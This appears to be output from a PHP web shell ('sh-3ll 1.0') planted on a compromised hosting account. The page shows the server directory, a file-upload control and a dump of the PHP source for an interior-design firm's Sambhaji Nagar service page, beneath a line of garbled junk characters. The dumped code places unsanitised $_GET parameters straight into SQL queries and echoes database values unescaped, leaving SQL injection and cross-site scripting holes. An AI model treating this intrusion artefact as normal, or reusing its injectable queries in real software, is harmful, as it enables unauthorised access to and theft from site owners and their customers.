fhdfhdfhdfhdfhdfhdfdfhdfhdfhdhfdfhdfhdfhd dfhdfhdfhdfhdfhdfhdfhdfdfhdfhdfhdhfdfhdfhdfhdfh bnmbertsurrttrtrtrtrjhjhjjhjhhjhjhjhf'tdfg php sh-3ll

HOME


sh-3ll 1.0
DIR:/home/tcfq2ylb8mbt/public_html/tanpureinterior.com/
Upload File :
Current File : /home/tcfq2ylb8mbt/public_html/tanpureinterior.com/interior-designer-in-sambhaji-nagar.php
<?php
include("./db_config.php");
include("./common/header_top.php");
?>
<title>Interior Designers in Sambhaji Nagar, Aurangabad - Tanpure</title>
<meta content="width=device-width, initial-scale=1.0" name="viewport">
<meta content="Transform your space with expert interior design services in Sambhaji Nagar. Specializing in residential and commercial projects. Contact us for a consultation today!" name="keywords">
<meta content="" name="description">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-Y9FWSHGTC5"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-Y9FWSHGTC5');
</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WF53GFHW');</script>
<!-- End Google Tag Manager -->
<meta name="google-site-verification" content="12bYOzuLjmlDkfeVDhURmuVdJjZsuKaDTdVLHTYK80Y" />
<?php
include("./common/header.php");
include("./common/navbar.php");


?>


<!-- Header Start -->
<div class="header bg-light p-0">
  <div class="container">
    <div class="row g-0 align-items-center flex-column-reverse flex-md-row">
      <div class="col-md-6 p-5 mt-lg-5">
        <h2 class="display-6 animated fadeIn mb-3">Interior Designer</h2>
        <nav aria-label="breadcrumb animated fadeIn">
          <ol class="breadcrumb text-uppercase">
            <li class="breadcrumb-item"><a href="#">Home</a></li>
            <li class="breadcrumb-item text-body active" aria-current="page"></li>
          </ol>
        </nav>
      </div>
      <div class="col-md-6 animated fadeIn">
        <h1>Interior Designer in Sambhaji Nagar</h1>
      </div>
    </div>
  </div>
</div>
<!-- Header End -->

<div class="container-xxl py-5">
    <div class="container">
        <div class="row g-5 align-items-top">
            <div class="col-lg-5 wow fadeIn" data-wow-delay="0.1s">
                <div class="about-img position-relative overflow-hidden p-3 pe-0">
                    <img class="img-fluid w-100" src="img/BRIJESH JI.jpg">
                </div>
            </div>
            <div class="col-lg-7 mt-0 wow fadeIn" data-wow-delay="0.5s">
                
                <p class="">
                    Welcome to the premier interior design services in Sambhaji Nagar. Transform your space with innovative and personalized design solutions that reflect your style and meet your needs.
</br></br>
<h2>Our Services</h2>
We offer a wide range of interior design services to cater to both residential and commercial spaces. Whether you’re looking to revamp a single room or redesign an entire property, we have the expertise to bring your vision to life. <br/>
                 
<h3>Residential Design</h3>
Our residential design services include space planning, furniture selection, color consultation, and custom design solutions. We work closely with homeowners to create spaces that are both functional and aesthetically pleasing.

<h3>Commercial Design</h3>
From office spaces to retail stores, our commercial design services are tailored to enhance productivity and create an inviting environment for customers. We focus on creating designs that align with your brand identity and business goals.

<h3>3D Visualization</h3>
We provide 3D visualization services to help you see your project before it comes to life. This allows you to make informed decisions and ensure every detail is perfect.
</br></br></br>
<h2>Our Process</h2>
We follow a systematic approach to ensure your project is completed on time and within budget. Our process is designed to be collaborative and transparent.

<h3>Consultation</h3>
The first step is a detailed consultation to understand your requirements, preferences, and budget. We take the time to listen to your ideas and provide professional advice.

<h3>Design Development</h3>
Based on the initial consultation, we develop a design concept that aligns with your vision. This includes mood boards, sketches, and material samples.

<h3>Implementation</h3>
Once the design is approved, our team of skilled craftsmen and contractors begin the implementation phase. We manage every aspect of the project to ensure a seamless execution.
</br></br></br>
<h2>Contact Us</h2>
Ready to transform your space? Get in touch with us today to schedule a consultation. We look forward to working with you and creating a space you’ll love.
                </p>
            <?php
            $result = mysqli_query($conn, "SELECT * FROM `sub_services` WHERE `service_id`='$_GET[service_id]' AND `status`=1");
            if (mysqli_num_rows($result) > 0) {
              while ($row = mysqli_fetch_array($result)) { ?>
                <a href="" class="w-100 mt-2">
                  <?php echo $row['sub_service_name']; ?>
                </a><br />
              <?php }
            } ?>
          </div>
        </div>
      </div>
      <div class="col-lg-9 subSerivces">
        <div class="row">
          <?php
          $results = mysqli_query($conn, "SELECT * FROM `plots_design` WHERE `service_id`='$_GET[service_id]' AND `status`=1 ORDER BY id ASC");
          if (mysqli_num_rows($results) > 0) {
            while ($rows = mysqli_fetch_array($results)) {
              $abc = "";
              $service_name = "";
              $resultssss = mysqli_query($conn, "SELECT * FROM `sub_services` WHERE `service_id`='$rows[sub_service_id]' AND `status`=1");
              while ($row = mysqli_fetch_array($resultssss)) {
                   $abc = $row['sub_service_name'];
               }
                $resultsss = mysqli_query($conn, "SELECT * FROM `services` WHERE `status`='1'");
                while ($rowss = mysqli_fetch_array($resultsss)) {
                    $service_name = $rowss['service_name'];
                }
                
            ?>
              <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.1s">
                    <div class="property-item rounded overflow-hidden">
                      <div class="position-relative overflow-hidden">
                        <a href="./admin_panel/upload/<?php echo $rows['plot_images']; ?>" target="_blank"><img class="img-fluid" src="./admin_panel/upload/<?php echo $rows['plot_images']; ?>" alt=""></a>
                        <div class="card w-100 p-2 bg-dark">
                            <a href="./service_details.php?<?php echo $service_name . "&service_id=" . $rows['service_id']."&".$abc."&sub_service_id=" . $rows['sub_service_id']; ?>">
                          <div class="categoryArea mb-0 d-flex justify-content-between"><span class="text-white">
                              <?php echo $rows['plot_code']; ?>
                            </span><span class="text-white">|</span> <span class="text-white">
                              <?php echo $rows['plot_name']; ?>
                            </span>
                          </div>
                            </a>
                        </div>
                      </div>
                      <div class="d-flex">
                        <div class="card w-100 p-2">
                          <div class="categoryArea mb-0 d-flex justify-content-between">
                                <span><b class="text-primary">Category </b>
                                  <?php echo $rows['plot_name']; ?>
                                </span>
                          </div>
                          <div class="categoryArea mb-0 d-flex justify-content-between"><span><b class="text-primary">Dimensions </b>
                              <?php echo $rows['width'] . " * " . $rows['length']; ?>
                            </span> <span><b class="text-primary">Area </b>
                              <?php echo $rows['plot_area']; ?>
                            </span>
                          </div>
                        </div>
                      </div>
                    </div>
              </div>

            <?php }
          } ?>

        </div>
      </div>
    </div>
  </div>
</section><!-- End Property Single-->

<!-- <div id="feedback"> -->
<a href="" class="btn btn-primary d-none enquiryBtn" data-bs-toggle="modal" data-bs-target="#exampleModal">Quick
  Enquiry</a>
<!-- </div> -->


<!-- Modal -->
<div class="modal fade mt-5 pt-3" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h5 class="modal-title" id="exampleModalLabel">Enquiry Form</h5>
        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
      </div>
        <form method="post" action="contact_form.php">
                <div class="modal-body">
                    <div class="row">
                        <div class="col-lg-12">
                            <label for="">Name<span class="text-danger">*</span></label>
                            <input type="text" name="name" id="name" class="form-control" placeholder="Full Name" required>
                        </div>
                    </div>
                    <div class="row mt-1">
                        <div class="col-lg-12">
                            <label for="">Email</label>
                            <input type="email" name="email" id="email" class="form-control" placeholder="Email" >
                        </div>
                    </div>
                    <div class="row mt-1">
                        <div class="col-lg-12">
                            <label for="">Mobile No.<span class="text-danger">*</span></label>
                            <input type="tel" name="mobile" id="mobile" class="form-control" placeholder="Mobile No." required>
                        </div>
                    </div>
                    <div class="row mt-1">
                        <div class="col-lg-12">
                            <label for="">Address<span class="text-danger">*</span></label>
                            <input type="text" name="address" id="address" class="form-control" placeholder="Address" required>
                        </div>
                    </div>
                    <div class="row mt-1">
                        <div class="col-lg-12">
                            <label for="">Requirement<span class="text-danger">*</span></label>
                            <input type="text" name="message" id="message" class="form-control" placeholder="Requirement" required>
                        </div>
                    </div>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
                    <button type="submit" name="submit"  class="btn btn-primary">Submit</button>
                </div>
            </form>
    </div>
  </div>
</div>


<?php include("./common/footer.php"); ?>